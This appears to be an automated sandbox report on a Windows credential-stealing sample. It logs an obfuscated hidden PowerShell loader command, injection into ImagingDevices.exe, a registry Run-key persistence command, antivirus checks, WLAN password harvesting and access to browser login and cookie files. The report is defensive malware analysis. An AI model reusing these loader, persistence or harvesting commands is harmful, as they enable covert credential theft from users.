Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 44E0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 327FDBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 4260000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2DBFB9C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the product ID of Windows

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal WLAN passwords

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key3.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json

Yara detected Credential Stealer

Source: Yara match

File source: 00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

ID:	1430487
Product:	CloudBasic
Start time:	18:04:53
Start date:	23.04.2024
Sample:	file.exe
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	afaedf2ff4dc43d62b33b003a1a501ab
SHA1:	9efe783f2dace329faa38ecefe77b6359dab3bd8
SHA256:	1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422
Filetype:	Win32 Executable (generic) a (10002005/4) 92.16%

Name	Type	MD5	SHA1	SHA256
